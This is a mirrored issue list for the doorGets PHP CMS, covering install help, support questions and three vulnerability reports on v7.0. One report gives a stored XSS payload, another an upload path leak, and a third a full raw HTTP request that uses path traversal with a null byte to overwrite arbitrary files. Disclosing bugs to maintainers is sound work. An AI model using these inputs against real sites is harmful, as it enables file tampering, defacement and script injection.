Giter Club home page Giter Club logo

cms's Introduction

PREPARATION

To install doorGets, you need a remote web server or on your computer (MAMP), with access to a database like MySQL. You'll need access to phpMyAdmin to create a database and to indicate the information in the database in the installer.

If you do not host and unable to create your store, we offer a turnkey store, which lets you create your online store in less than 10 minutes without any technical knowledge.

INSTALLATION

http://www.doorgets.com/t/en/?installation

cms's People

Contributors

mounirrquiba avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

cms's Issues

http 500 error.

Hi,

site works fine but I get 500 error when saving the article, entering dashboard, opening modules. and i noticed when uploading picture wont save. Chmod changed from 755 to 777 all files and direcries.

Error gets on webserver vps, but on localhost works perfect. its same configuration without htaacces file.

doorGets v7.0 has a Stored Cross Site Scripting in ARTICLE CONTENT.

A xss vulnerability was discovered in doorGets v7.0.
There is a stored XSS vulnerability in ARTICLE if I use the payload </textarea><script>alert(111)</script>.

First, you need to add article.
image
http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&action=add

Then add payload(</textarea><script>alert(111)</script>) to article content.
image

Save the article and click the generated link.
image

Change the content of an article.
image

When you click the article content, it will trigger the payload.
image

View page source, you will find the XSS payload.
image

Do you need Filipino Translation for doorgets?

Hi there,

Good day and how are you? I hope this message finds you well.

I am Joseph Buarao , who has been doing high quality Filipino and Tagalog translations for several projects.

Consider this message as my letter of application. I am a web developer by profession and an experienced Filipino translator - these are on top of being an experienced web developer with more than 6 years of experience and specialized in the following scripting languages and technologies (HTML, CSS, JS, JQUERY, PHP, WORDPRESS and CONCRETE5). This means I know which codes are to be translated, and which ones that are to remain as it is. I am a strong advocate of thought-by-thought instead of word-by-word style of doing the translations, and I am carefully strict in grammars and spellings and proper word conjugations of my languages, Filipino and Tagalog.

I hope to hear from you soon and work with you in the translations. You can count on me that I will do my job with utmost dedication. Thank you and more power to you.

You can check my previous contributions:

textpattern/textpattern@29308ff
https://crowdin.com/project/textpattern-cms-textpacks/fil

Best Regards,
Joseph Buarao

How to upgrade to Doorgets 7.0

Hello Developers,

I would like to upgrade my Doorgets installation to 7.0. How can I do it best? Is that also the Doorgtes backend or do I have to do it manually.

Once a glitch is me this happened and I have to reinstall everything. The contents were naturally away.

Thank you in advance.

doorGets v7.0 will leak absolute path in FILE UPLOAD.

A leaked absolute path vulnerability was discovered in doorGets v7.0.
There is a leaked absolute path vulnerability in ARTICLE if I upload file.
http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&lg=cn

First, add the article.
http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&action=add
image

Then, upload file.
image

File upload success and returned data packets
image

Modify the content-type value to text/html, you will find the absolute path in the packet.
image

How to setup or use your own Disqus Comments

Hello developers!

I deal with just Doorgets and would like to have in their own blog Disqus comments. Unfortunately I do not know where or template where you have to enter the Disqus-Short name.

Can you help me maybe?

Thank you in advance.

Modify the contents of the file at will

Create a file under the c drive,Content is test
image
poc:
image

Modify the contents of the file in 1.txt by poc

`POST /doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=../../../../../../../../../../../../../1.txt%00 HTTP/1.1
Host: 192.168.235.239
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.235.239/doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=doorgets/css/1.txt
Content-Type: multipart/form-data; boundary=---------------------------213043527767318740686762945
Content-Length: 456
Connection: close
Cookie: PHPSESSID=hnqke81g3nt2l9jjb9v2mn9va4
Upgrade-Insecure-Requests: 1

-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="theme_content_nofi"

this is payload
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_bootstrap_version"

paper
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_submit"

Save
-----------------------------213043527767318740686762945--
`

image

Of course, you can also modify the contents of any file to make the web unusable.

.htaccess : 500 error

Hello

The .htaccess file gives me a 500 error.
ModRewrite is usually ok with other PHP scripts.

Seems to me that there are a lots of "space" in the URL/regexp...

Renamed to another name and site is ok though...

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.